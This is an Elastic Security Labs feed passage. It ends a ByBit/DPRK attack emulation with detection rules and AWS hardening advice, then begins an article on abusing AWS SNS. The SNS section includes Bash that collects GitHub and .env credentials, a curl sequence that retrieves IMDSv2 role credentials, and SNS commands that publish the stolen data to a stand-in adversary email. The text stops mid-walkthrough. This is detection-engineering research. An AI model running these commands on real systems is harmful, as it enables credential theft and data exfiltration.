<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unsigned_or_untrusted_binary_execution_via_python.md">Unsigned or Untrusted Binary Execution via Python</a>”:</strong> Detects when an unsigned or untrusted binary gets executed by Python where the executable is located within a suspicious directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unsigned_or_untrusted_binary_fork_via_python.md">Unsigned or Untrusted Binary Fork via Python</a>”:</strong> Detects when an unsigned or untrusted binary gets fork exec’d by Python where the process argument is the path to a file within the user’s home directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/endpoint-rules/blob/13bad7e92e53f078b97bbeb376aedb23797be21b/rules/macos/credential_access_cloud_credential_file_accessed_by_untrusted_or_unsigned_process.toml">Cloud Credential Files Accessed by Process in Suspicious Directory</a>”:</strong> Detects when cloud credentials are accessed by a process running from a suspicious directory.</p>
<h4>SIEM Detections for AWS CloudTrail Logs</h4>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/44a2f4c41aa1482ec545f0391040e254c29a8d80/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml">STS Temporary IAM Session Token Used from Multiple Addresses</a>”:</strong> Detects AWS IAM session tokens (e.g. ASIA*) being used from multiple source IP addresses in a short timeframe, which may indicate credential theft and reuse from adversary infrastructure.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/2f4a310cc5d75f8d8f2a2d0f5ad5e5a4537e26a3/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml">IAM Attempt to Register Virtual MFA Device with Temporary Credentials</a>”:</strong> Detects attempts to call CreateVirtualMFADevice or EnableMFADevice with AWS session tokens. This may reflect an attempt to establish persistent access using hijacked short-term credentials.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/b64ecc925304b492d7855d357baa6c68711eef9a/rules/integrations/aws/persistence_iam_sts_api_calls_via_user_session_token.toml">API Calls to IAM via Temporary Session Tokens</a>”:</strong> Detects use of sensitive iam.amazonaws.com API operations by a principal using temporary credentials (e.g. session tokens with the ASIA* prefix). These operations typically require MFA and should only be performed via the AWS console or by federated users, not via CLI or automation tokens.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/29dfe1217d1320ab400d051de377664fdbb09493/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml">S3 Static Site JavaScript File Uploaded via PutObject</a>”:</strong> Identifies attempts by IAM users to upload or modify JavaScript files in the static/js/ directory of an S3 bucket, which can signal frontend tampering (e.g. injection of malicious code).</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/b35f7366e92321105f61249b233f436c40b59c19/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml">AWS CLI with Kali Linux Fingerprint Identified</a>”:</strong> Detects AWS API calls made from a system using Kali Linux, as indicated by the user_agent.original string. This may reflect attacker infrastructure or unauthorized access from red team tooling.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/main/hunting/aws/queries/s3_public_bucket_rapid_object_access_attempts.toml">S3 Excessive or Suspicious GetObject Events</a>”:</strong> Detects a high volume of S3 GetObject actions by the same IAM user or session within a short time window. This may indicate S3 data exfiltration using tools like AWS CLI command <em>sync</em> - particularly targeting static site files or frontend bundles. Note, this is a hunting query and should be adjusted accordingly.</p>
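<p>The first rule in this list, temporary session token reuse from multiple addresses, reduces to a small aggregation over CloudTrail events. The sketch below is a simplified, hedged model of that logic: group events by ASIA* access key and flag keys seen from more than one source IP within a short window. Field names follow CloudTrail; the events, IPs, and window length are fabricated for illustration.</p>

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # illustrative detection window

def keys_used_from_multiple_ips(events):
    """Return temporary access keys seen from 2+ distinct IPs inside WINDOW."""
    sightings = defaultdict(list)  # access key -> [(time, ip), ...]
    for e in events:
        key = e["accessKeyId"]
        if key.startswith("ASIA"):  # only temporary (STS) credentials
            sightings[key].append((e["eventTime"], e["sourceIPAddress"]))
    flagged = set()
    for key, seen in sightings.items():
        seen.sort()
        for i, (t1, _ip1) in enumerate(seen):
            ips = {ip for t, ip in seen[i:] if t - t1 <= WINDOW}
            if len(ips) > 1:
                flagged.add(key)
    return flagged

events = [  # fabricated sample: one token, two source IPs, 5 minutes apart
    {"accessKeyId": "ASIAEXAMPLEKEY", "eventTime": datetime(2025, 2, 5, 12, 0), "sourceIPAddress": "203.0.113.10"},
    {"accessKeyId": "ASIAEXAMPLEKEY", "eventTime": datetime(2025, 2, 5, 12, 5), "sourceIPAddress": "198.51.100.7"},
]
print(keys_used_from_multiple_ips(events))  # → {'ASIAEXAMPLEKEY'}
```

<p>The production rule handles this server-side with an aggregation query; the Python version just makes the correlation explicit.</p>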
<h4>SIEM Detections for Docker Abuse</h4>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_suspicious_file_access_via_docker.md">Sensitive File Access via Docker</a>”:</strong> Detects when Docker accesses sensitive host files (“ssh”, “aws”, “gcloud”, “azure”, “web browser”, “crypto wallet files”).</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_suspicious_executable_file_modification_via_docker.md">Suspicious Executable File Modification via Docker</a>”:</strong> Detects when Docker creates or modifies an executable file within a suspicious or unusual directory.</p>
<p>If your macOS agent policy includes the <a href="https://www.elastic.co/es/docs/reference/beats/filebeat/filebeat-input-container">Docker data integration</a>, you can collect valuable telemetry that helps surface malicious container activity on user systems. In our emulation, this integration allowed us to ingest Docker logs (into the metrics index), which we then used to build a detection rule capable of identifying indicators of compromise and suspicious container executions associated with the malicious application.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image17.png" alt="" /></p>
<h2>Mitigations</h2>
<h3>Social Engineering</h3>
<p>Social engineering plays a major role in many intrusions, and it is a particular strength of DPRK actors. They are highly adept at targeting and approaching victims through trusted public platforms like LinkedIn, Telegram, X, or Discord to initiate contact and appear legitimate. Many of their campaigns try to convince the user to download and execute some kind of project, application, or script, framed as a necessity (a job application), a moment of distress (a request for debugging help), or a similar pretext. Mitigating social engineering is difficult and takes a concerted effort: a company must ensure its employees are regularly trained to recognize these attempts and to apply proper skepticism and caution when engaging with outside entities, including open source communities.</p>
<ul>
<li>User Awareness Training</li>
<li>Manual Static Code Review</li>
<li>Static Code and Dependency Scanning</li>
</ul>
<p>Bandit (<a href="https://github.com/PyCQA/bandit">GitHub - PyCQA/bandit</a>) is a great example of an open source tool a developer could use to scan a Python application and its scripts prior to execution, surfacing common Python security vulnerabilities or dangerous patterns present in the code.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image19.png" alt="" /></p>
<h3>Application and Device Management</h3>
<p>Application controls via a device management solution or a binary authorization framework like the open source tool Santa (<a href="https://github.com/northpolesec/santa">GitHub - northpolesec/santa: A binary and file access authorization system for macOS.</a>) could have been used to enforce notarization and block execution from suspicious paths. This would have prevented the execution of the Poseidon payload dropped to the system for persistence, and could have prevented access to sensitive files.</p>
<h3>EDR/XDR</h3>
<p>To effectively defend against nation-state threats—and the many other attacks targeting macOS—it's critical to have an EDR solution in place that provides rich telemetry and correlation capabilities to detect and prevent script-based attacks. Taking it a step further, an EDR platform like Elastic allows you to ingest AWS logs alongside endpoint data, enabling unified alerting and visibility through a single pane of glass. When combined with AI-powered correlation, this approach can surface cohesive attack narratives, significantly accelerating response and improving your ability to act quickly if such an attack occurs.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image3.png" alt="Elastic Alerts Dashboard" /></p>
<h3>AWS Credential Exposure and Session Token Hardening</h3>
<p>In this attack, the adversary leveraged a stolen AWS user session token (with the ASIA* prefix), which had been issued via the GetSessionToken API using MFA. These credentials were likely retrieved from the macOS developer environment — either from exported environment variables or default AWS config paths (e.g., <code>~/.aws/credentials</code>).</p>
<p>To mitigate this type of access, organizations can implement the following defensive strategies:</p>
<ol>
<li><strong>Reduce Session Token Lifetimes and Move Away from IAM Users</strong>: Avoid issuing long-lived session tokens to IAM users. Instead, enforce short token durations (e.g., 1 hour or less) and adopt AWS SSO (IAM Identity Center) for all human users. This makes session tokens ephemeral, auditable, and tied to identity federation. Disabling sts:GetSessionToken permissions for IAM users altogether is the strongest approach, and IAM Identity Center allows this transition.</li>
<li><strong>Enforce Session Context Restrictions for IAM API Usage</strong>: Implement IAM policy condition blocks that explicitly deny sensitive IAM operations, such as <em>iam:CreateVirtualMFADevice</em> or <em>iam:AttachUserPolicy</em>, if the request is made using temporary credentials. This ensures that session-based keys, such as those used in the attack, cannot escalate privileges or modify identity constructs.</li>
<li><strong>Limit MFA Registration to Trusted Paths</strong>: Block MFA device creation (<em>CreateVirtualMFADevice</em>, <em>EnableMFADevice</em>) via session tokens unless coming from trusted networks, devices, or IAM roles. Use <em>aws:SessionToken</em> or <em>aws:ViaAWSService</em> as policy context keys to enforce this. This would have prevented the adversary from attempting MFA-based persistence using the hijacked session.</li>
</ol>
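<p>Strategy 2 above can be expressed as an IAM deny statement keyed on the presence of temporary credentials. One documented way to match temporary-credential requests is the <code>aws:TokenIssueTime</code> global condition key, which exists only for STS-issued sessions, so <code>"Null": {"aws:TokenIssueTime": "false"}</code> matches requests signed with session tokens. The sketch below builds such a policy; treat it as a starting point and verify the condition keys against current AWS documentation before deploying.</p>

```python
import json

# Hedged sketch: deny sensitive IAM actions when the request is signed
# with temporary credentials. "Null": {"aws:TokenIssueTime": "false"}
# matches requests where the key IS present, i.e. STS session credentials.
deny_iam_via_session = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyIAMWithTemporaryCredentials",
            "Effect": "Deny",
            "Action": [
                "iam:CreateVirtualMFADevice",
                "iam:EnableMFADevice",
                "iam:AttachUserPolicy",
            ],
            "Resource": "*",
            "Condition": {"Null": {"aws:TokenIssueTime": "false"}},
        }
    ],
}
print(json.dumps(deny_iam_via_session, indent=2))
```

<p>Attached to the compromised IAM user, a policy like this would have denied the <code>CreateVirtualMFADevice</code> call regardless of whether the original session carried MFA context.</p>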
<h3>S3 Application Layer Hardening (Frontend Tampering)</h3>
<p>After obtaining the AWS session token, the adversary did not perform any IAM enumeration — instead, they pivoted quickly to S3 operations. Using the AWS CLI and temporary credentials, they listed S3 buckets and modified static frontend JavaScript hosted on a public S3 bucket. This allowed them to replace the production Next.js bundle with a malicious variant designed to redirect transactions based on specific wallet addresses.</p>
<p>To prevent this type of frontend tampering, implement the following hardening strategies:</p>
<ol>
<li><strong>Enforce Immutability with S3 Object Lock</strong>: Enable S3 Object Lock in compliance or governance mode on buckets hosting static frontend content. This prevents overwriting or deletion of files for a defined retention period - even by compromised users. Object Lock adds a strong immutability guarantee and is ideal for public-facing application layers. Access to put new objects (rather than overwrite) can still be permitted via deployment roles.</li>
<li><strong>Implement Content Integrity with Subresource Integrity (SRI)</strong>: Include SRI hashes (e.g., SHA-256) in the &lt;script&gt; tags within index.html to ensure the frontend only executes known, validated JavaScript bundles. In this attack, the lack of integrity checks allowed arbitrary JavaScript to be served and executed from the S3 bucket. SRI would have blocked this behavior at the browser level.</li>
<li><strong>Restrict Upload Access Using CI/CD Deployment Boundaries</strong>: Developers should never have direct write access to production S3 buckets. Use separate AWS accounts or IAM roles for development and CI/CD deployment. Only OIDC-authenticated GitHub Actions or trusted CI pipelines should be permitted to upload frontend bundles to production buckets. This ensures human credentials, even if compromised, cannot poison production.</li>
<li><strong>Lock Access via CloudFront Signed URLs or Use S3 Versioning</strong>: If the frontend is distributed via CloudFront, restrict access to S3 using signed URLs and remove public access to the S3 origin. This adds a proxy and control layer. Alternatively, enable S3 versioning and monitor for overwrite events on critical assets (e.g., /static/js/*.js). This can help detect tampering by adversaries attempting to replace frontend files.</li>
</ol>
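<p>To make the SRI recommendation concrete, the integrity attribute is just a hash of the exact bundle bytes, base64-encoded with an algorithm prefix. The sketch below computes a SHA-256 SRI value; the bundle bytes and script path are illustrative stand-ins, not the real Safe{Wallet} assets.</p>

```python
import base64
import hashlib

def sri_sha256(bundle: bytes) -> str:
    """Return a Subresource Integrity value like 'sha256-...' for a bundle."""
    digest = hashlib.sha256(bundle).digest()
    return "sha256-" + base64.b64encode(digest).decode()

# Stand-in bytes for a built bundle such as _app-<hash>.js
bundle = b"console.log('app bundle');"
integrity = sri_sha256(bundle)
print(f'<script src="/static/js/app.js" integrity="{integrity}" crossorigin="anonymous"></script>')
```

<p>Because any change to the file changes the hash, a browser enforcing this attribute would have refused to execute the tampered bundle uploaded to the S3 bucket.</p>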
<h2>Attack Discovery (AD)</h2>
<p>After completing the end-to-end attack emulation, we tested Elastic’s new AI Attack Discovery feature to see if it could connect the dots between the various stages of the intrusion. Attack Discovery integrates with an LLM of your choice to analyze alerts across your stack and generate cohesive attack narratives. These narratives help analysts quickly understand what happened, reduce response time, and gain high-level context. In our test, it successfully correlated the endpoint compromise with the AWS intrusion, providing a unified story that an analyst could use to take informed action.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image10.png" alt="Elastic Attack Discovery" /></p>
<h2>Osquery</h2>
<p>When running Elastic Defend through Elastic Agent, you can also deploy the Osquery Manager integration to centrally manage osquery across all agents in your Fleet. This enables you to query host data using distributed SQL. During our testing of the Dockerized malicious application, we used osquery to inspect the endpoint and successfully identified the container running with privileged permissions.</p>
<pre><code class="language-sql">SELECT name, image, readonly_rootfs, privileged FROM docker_containers
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image18.png" alt="Elastic OSQuery Live Query" /></p>
<p>We scheduled this query to run on a recurring basis, sending results back to our Elastic Stack. From there, we built a threshold-based detection rule that alerts whenever a new privileged container appears on a user’s system and hasn’t been observed in the past seven days.</p>
<h2>Conclusion</h2>
<p>The ByBit attack was one of the most consequential intrusions attributed to DPRK threat actors—and thanks to detailed reporting and available artifacts, it also provided a rare opportunity for defenders to emulate the full attack chain end to end. By recreating the compromise of a SAFE developer’s macOS workstation—including initial access, payload execution, and AWS pivoting—we validated our detection capabilities against real-world nation-state tradecraft.</p>
<p>This emulation not only highlighted technical insights—like how PyYAML deserialization can be abused to gain initial access—but also reinforced critical lessons in operational defense: the value of user awareness, behavior-based EDR coverage, secure developer workflows, effective cloud IAM policies, cloud logging and holistic detection/response across platforms.</p>
<p>Adversaries are innovating constantly, but so are defenders—and this kind of research helps tip the balance. We encourage you to follow <a href="https://x.com/elasticseclabs">@elasticseclabs</a> and check out our threat research at <a href="https://www.elastic.co/es/security-labs">elastic.co/security-labs</a> to stay ahead of evolving adversary techniques.</p>
<p>Resources:</p>
<ol>
<li><a href="https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/">Bybit – What We Know So Far</a></li>
<li><a href="https://x.com/safe/status/1897663514975649938">Safe.eth on X: &quot;Investigation Updates and Community Call to Action&quot;</a></li>
<li><a href="https://slowmist.medium.com/cryptocurrency-apt-intelligence-unveiling-lazarus-groups-intrusion-techniques-a1a6efda7d34">Cryptocurrency APT Intelligence: Unveiling Lazarus Group’s Intrusion Techniques</a></li>
<li><a href="https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/">Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware</a></li>
<li><a href="https://www.elastic.co/es/security-labs/dprk-code-of-conduct">Code of Conduct: DPRK’s Python-fueled intrusions into secured networks</a></li>
<li><a href="https://www.elastic.co/es/security-labs/elastic-catches-dprk-passing-out-kandykorn">Elastic catches DPRK passing out KANDYKORN</a></li>
</ol>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/bit-bybit.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[AWS SNS Abuse: Data Exfiltration and Phishing]]></title>
            <link>https://www.elastic.co/es/security-labs/aws-sns-abuse</link>
            <guid>aws-sns-abuse</guid>
            <pubDate>Thu, 13 Mar 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[During a recent internal collaboration, we dug into publicly known SNS abuse attempts and our knowledge of the data source to develop detection capabilities.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Welcome to another installment of AWS detection engineering with Elastic. This article will dive into both how threat adversaries (TA) leverage AWS’ Simple Notification Service (SNS) and how to hunt for indicators of abuse using that data source.</p>
<p>Expect to learn about potential techniques threat adversaries may exercise in regards to SNS. We will also explore security best practices, hardening roles and access, as well as how to craft threat detection logic for SNS abuse.</p>
<p>This research was the result of a recent internal collaboration that required us to leverage SNS for data exfiltration during a whitebox exercise. During this collaboration, we became intrigued by how a simple publication and subscription (pub/sub) service could be abused by adversaries to achieve various actions on objectives. We dug into publicly known SNS abuse attempts and our knowledge of the data source to assemble this research about detection opportunities.</p>
<p>Do enjoy!</p>
<h1>Understanding AWS SNS</h1>
<p>Before we get started on the details, let’s discuss what AWS SNS is to have a basic foundational understanding.</p>
<p>AWS SNS is a web service that allows users to send and receive notifications from the cloud. Think of it like a news feed: a digital topic is created, parties interested in updates subscribe via email, Slack, or another channel, and when data is published to that topic, every subscriber is notified and receives it. This describes what is commonly referred to as a pub/sub service, offered by most cloud service providers (CSPs). In Azure, this is offered as <a href="https://azure.microsoft.com/en-us/products/web-pubsub">Web PubSub</a>, whereas GCP offers <a href="https://cloud.google.com/pubsub#documentation">Pub/Sub</a>. While the names of these services may slightly differ from platform to platform, the utility and purpose do not.</p>
<p>SNS provides two workflows, <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-user-notifications.html">application-to-person</a> (A2P) and <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-system-to-system-messaging.html">application-to-application</a> (A2A), that serve different purposes. A2A workflows focus on integration with AWS services such as Firehose, Lambda, and SQS. For this article, however, we are going to focus our attention on A2P workflows. As shown in the diagram below, an SNS topic is commonly created, allowing subscribers to receive messages via SMS, email, or push notifications.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image5.png" alt="" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image12.png" alt="" /></p>
<p><strong>Additional Features:</strong></p>
<p><strong>Filter Policies:</strong> Subscribers can define filtering rules to receive only a relevant subset of messages. These filter policies are defined in JSON format, specifying which message attributes the subscriber is interested in. SNS evaluates these policies server-side before delivery to determine which subscribers should receive each message.</p>
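<p>A simplified, hedged model of that server-side matching for string attributes: a subscriber receives a message only if every key in its filter policy matches one of the message's attribute values. Real SNS policies also support prefix matching, numeric ranges, and anything-but clauses; this sketch covers exact string matching only, and the policy and attributes are invented examples.</p>

```python
def matches_filter_policy(policy: dict, attributes: dict) -> bool:
    """True if every policy key matches the message's attribute value."""
    # An empty policy matches everything, mirroring a subscription
    # configured without any filter policy.
    return all(attributes.get(key) in allowed for key, allowed in policy.items())

policy = {"eventType": ["order_placed", "order_refunded"]}
print(matches_filter_policy(policy, {"eventType": "order_placed"}))   # → True
print(matches_filter_policy(policy, {"eventType": "order_shipped"}))  # → False
```
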
<p><strong>Encryption</strong>: SNS leverages <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-server-side-encryption.html">server-side encryption</a> (SSE) using AWS Key Management Service (KMS) to secure messages at rest. When encryption is enabled, messages are encrypted before being stored in SNS and then decrypted upon delivery to the endpoint. This is of course important for maintaining the security of Personal Identifiable Information (PII) or other sensitive data such as account numbers. Not to fear, although SNS only encrypts at rest, other protocols (such as HTTPS) handle encryption in transit, making it end-to-end (E2E).</p>
<p><strong>Delivery Retries and Dead Letter Queues (DLQs)</strong>: SNS automatically retries message delivery to endpoints, such as SQS, Lambda, etc. in case of unexpected failures. Messages that ultimately fail to deliver land in <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html">DLQs</a>, typically AWS SQS queues, enabling developers to debug delivery failures.</p>
<p><strong>Scalability</strong>: AWS SNS is designed to handle massive message volumes, automatically scaling to accommodate increasing traffic without manual intervention. There are no upfront provisioning requirements, and you pay only for what you use, making it cost-effective for most organizations.</p>
<p>AWS SNS is a powerful tool for facilitating communication in cloud environments. For a deeper understanding, we recommend diving into the existing <a href="https://docs.aws.amazon.com/sns/latest/dg/welcome.html">documentation</a> from AWS. However, its versatility and integration capabilities also make it susceptible to abuse. In the next section, we explore some scenarios where adversaries might leverage SNS for malicious purposes.</p>
<h1>Whitebox Testing</h1>
<p>Whitebox testing involves performing atomic emulations of malicious behavior in a controlled environment, with full visibility into the vulnerable or misconfigured infrastructure and its configurations. This approach is commonly employed in cloud environments to validate detection capabilities during the development of threat detection rules or models targeting specific tactics, techniques, and procedures (TTPs). Unlike endpoint environments, where adversary simulations often involve detonating malware binaries and tools, cloud-based TTPs typically exploit existing API-driven services through &quot;living-off-the-cloud&quot; techniques, making this approach essential for accurate analysis and detection.</p>
<h2>Data Exfiltration via SNS</h2>
<p>Exfiltration via SNS starts with creating a topic that serves as a proxy for receiving stolen data and delivering it to the external media source, such as email or mobile. Adversaries would then subscribe that media source to the topic so that any data received is forwarded to them. After this is staged, it is only a matter of packaging data and publishing it to the SNS topic, which handles the distribution. This method allows adversaries to bypass traditional data protection mechanisms such as network ACLs, and exfiltrate information to unauthorized external destinations.</p>
<p><strong>Example Workflow:</strong></p>
<ul>
<li>Land on EC2 instance and perform discovery of sensitive data, stage it for later</li>
<li>Leverage IMDSv2 and STS natively with the installed AWS CLI to get temporary creds</li>
<li>Create a topic in SNS and attach an external email address as a subscriber</li>
<li>Publish sensitive information to the topic, encoded in Base64 (or plaintext)</li>
<li>The external email address receives the exfiltrated data</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image3.png" alt="Visual workflow for data exfiltration via AWS SNS" /></p>
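<p>The steps above can be sketched as a few small Bash functions. This is an illustrative sketch only: the topic name, subscriber email, and staging path are hypothetical, and the <code>aws</code> CLI calls assume valid credentials on the instance.</p>

```shell
#!/bin/bash
# Illustrative sketch of the exfiltration workflow; names are hypothetical.

stage_creds() {
  # Collect candidate credential files into one staging file
  cat "$@" > /tmp/stolen_creds.txt 2>/dev/null
}

encode_payload() {
  # Base64-encode the staged data for publishing as an SNS message
  base64 < "$1"
}

exfil_via_sns() {
  # Create a topic, subscribe the attacker-controlled email, publish payload
  local topic_arn
  topic_arn=$(aws sns create-topic --name "whitebox-sns-topic" \
    --query 'TopicArn' --output text)
  aws sns subscribe --topic-arn "$topic_arn" --protocol email \
    --notification-endpoint "adversary@protonmail.com"
  aws sns publish --topic-arn "$topic_arn" \
    --message "$(encode_payload /tmp/stolen_creds.txt)" \
    --subject "Encoded Credentials from EC2"
}
```

<p>Each function maps to one bullet in the workflow; in practice an adversary could drop this as a single script through a web shell.</p>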
<h3>Infrastructure Setup</h3>
<p>For the victim infrastructure, we’ll use our preferred infrastructure-as-code (IaC) framework, Terraform.</p>
<p>A <a href="https://gist.github.com/terrancedejesus/a01aa8f75f715e6baa726a21fcdf2289">public gist</a> has been created, containing all the necessary files to follow this example. In summary, these Terraform configurations deploy an EC2 instance in AWS within a public subnet. The setup includes a <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html">user-data script</a> that adds dummy credentials for sensitive data as environment variables, and installs the AWS CLI to emulate a compromised environment. Additionally, the EC2 instance is assigned an IAM role with permissions for <code>sns:Publish</code>, <code>sns:Subscribe</code> and <code>sns:CreateTopic</code>.</p>
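<p>To give a sense of what such a user-data script might contain, here is a minimal sketch that plants dummy credential files. The file paths and values are hypothetical and not taken from the gist.</p>

```shell
#!/bin/bash
# Hypothetical user-data sketch: plants dummy credentials an attacker could
# later discover. Paths and values are illustrative only.
setup_dummy_creds() {
  local home_dir="${1:-/home/ubuntu}"
  mkdir -p "$home_dir/.github"
  cat <<'EOF' > "$home_dir/.github/credentials"
github_token=ghp_EXAMPLEFAKETOKEN
EOF
  cat <<'EOF' > "$home_dir/project.env"
DB_PASSWORD=SuperSecret123!
AWS_ACCESS_KEY_ID=AKIAEXAMPLEFAKEKEY
EOF
}
```
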
<p>There are several potential ways an adversary might gain initial access to this EC2 instance, including exploiting vulnerable web applications for web shell deployment, using stolen SSH credentials, password spraying, or credential stuffing. For this particular example scenario, let’s assume the attacker gained initial entry via a vulnerable web application and subsequently uploaded a web shell. The next goal in this case would be persistence via credential access. This is commonly seen <a href="https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603">in-the-wild</a> when adversaries target popular 3rd-party software or web apps such as Oracle WebLogic, Apache Tomcat, Atlassian Confluence, and Microsoft Exchange.</p>
<p>To get started, download the Terraform files from the gist.</p>
<ol>
<li>Adjust the variables in the <code>variables.tf</code> file to match your setup.
<ol>
<li>Add your whitelisted IPv4 address for <code>trusted_ip_cidr</code></li>
<li>Add your local SSH key file path to <code>public_key_path</code></li>
<li>Ensure <code>ami_id.default</code> is the correct AMI ID for your region</li>
</ol>
</li>
<li>Run <code>terraform init</code> in the folder to initialize the working directory.</li>
</ol>
<p>When ready, run <code>terraform apply</code> to deploy the infrastructure.</p>
<p>A few reminders:</p>
<ul>
<li>Terraform uses your AWS CLI default profile, so ensure you’re working with the correct profile in your AWS configuration.</li>
<li>The provided AMI ID is specific to the <code>us-east-1</code> region. If you're deploying in a different region, update the AMI ID accordingly in the <code>variables.tf</code> file.</li>
<li>Change <code>trusted_ip_cidr.default</code> in <code>variables.tf</code> from 0.0.0.0/0 (any IP) to your publicly known CIDR range.</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image2.png" alt="" /></p>
<p><em>Terraform apply output</em></p>
<p>Let’s SSH into our EC2 instance to ensure that our sensitive credentials were created from the user-data script. Note in the <code>outputs.tf</code> file, we ensured that the SSH command would be generated for us based on the key path and public IP of our EC2 instance.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image10.png" alt="Bash command output for credential check" /></p>
<p>With this infrastructure staged and confirmed, we can then move on to practical execution.</p>
<h3>The Workflow in Practice: Exfiltrating Sensitive Credentials</h3>
<p>Let’s step through this workflow in practice, now that our infrastructure is established. As a reminder, the goal of our opportunistic adversary is to check for local credentials, grab what they can, and stage the sensitive data locally. Since landing on this EC2 instance, we have identified that the AWS CLI exists and that we have SNS permissions. Thus, we plan to create an SNS topic, register an external email as a subscriber, and then exfiltrate our stolen credentials and other data as SNS messages.</p>
<p>Note: While this example is extremely simple, the goal is to focus on SNS as a methodology for exfiltration. The exact circumstances and scenario will differ depending on the specific infrastructure setup of the victim.</p>
<p><strong>Identify and Collect Credentials from Common Locations:</strong><br />
Our adversary will target GitHub credentials files and .env files locally with some good ol’ fashioned Bash scripting. This will take the credentials from these files and drop them into the <code>/tmp</code> temporary folder, staging them for exfiltration.</p>
<p>Command: <code>cat /home/ubuntu/.github/credentials /home/ubuntu/project.env &gt; /tmp/stolen_creds.txt</code></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image11.png" alt="" /></p>
<p><strong>Stage Exfiltration Method by Creating SNS Topic</strong><br />
Let’s leverage the existing AWS CLI to create the SNS topic. As a reminder, this EC2 instance assumes the custom IAM role we created and attached, which allows it to create SNS topics and publish messages. Since the AWS CLI is pre-installed on our EC2 instance, it will retrieve temporary credentials from IMDSv2 for the assumed role when invoked. However, if this were not the case, an adversary could retrieve credentials natively with the following bash code.</p>
<pre><code># Fetch the IMDSv2 token
TOKEN=$(curl -X PUT &quot;http://169.254.169.254/latest/api/token&quot; -H &quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;)

# Get the IAM role name
ROLE_NAME=$(curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; http://169.254.169.254/latest/meta-data/iam/security-credentials/)

# Fetch the temporary credentials
CREDENTIALS=$(curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME)

# Extract and export the Access Key, Secret Key, and Session Token so the AWS CLI picks them up
export AWS_ACCESS_KEY_ID=$(echo $CREDENTIALS | jq -r '.AccessKeyId')
export AWS_SECRET_ACCESS_KEY=$(echo $CREDENTIALS | jq -r '.SecretAccessKey')
export AWS_SESSION_TOKEN=$(echo $CREDENTIALS | jq -r '.Token')
</code></pre>
<p>Once this is complete, let’s attempt to create our SNS topic and the email address that will be used as our external receiver for the exfiltrated data.</p>
<p>Create Topic Command: <code>TOPIC_ARN=$(aws sns create-topic --name &quot;whitebox-sns-topic&quot; --query 'TopicArn' --output text)</code></p>
<p>Subscribe Command: <code>aws sns subscribe --topic-arn &quot;$TOPIC_ARN&quot; --protocol email --notification-endpoint &quot;adversary@protonmail.com&quot;</code></p>
<p>After the commands above are run, we can navigate to the inbox of the external email address to confirm the subscription. Once confirmed, our external email address will receive any messages sent to the <code>whitebox-sns-topic</code> topic, which we plan to use for exfiltration.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image9.png" alt="" /></p>
<p><strong>Exfiltrate Data via SNS Publish</strong><br />
At this point, we have gained access to an EC2 instance, snooped around to understand our environment, identified some services for abuse and some credentials that we want to obtain. Note that our previous steps could all have been accomplished via a simple Bash script that could be dropped on the compromised EC2 instance via our webshell, but this is broken down into individual steps for example purposes..</p>
<p>Next, we can take the data we stored in <code>/tmp/stolen_creds.txt</code>, base64 encode it and ship it to our adversary controlled email address via SNS.</p>
<p>Commands:</p>
<ul>
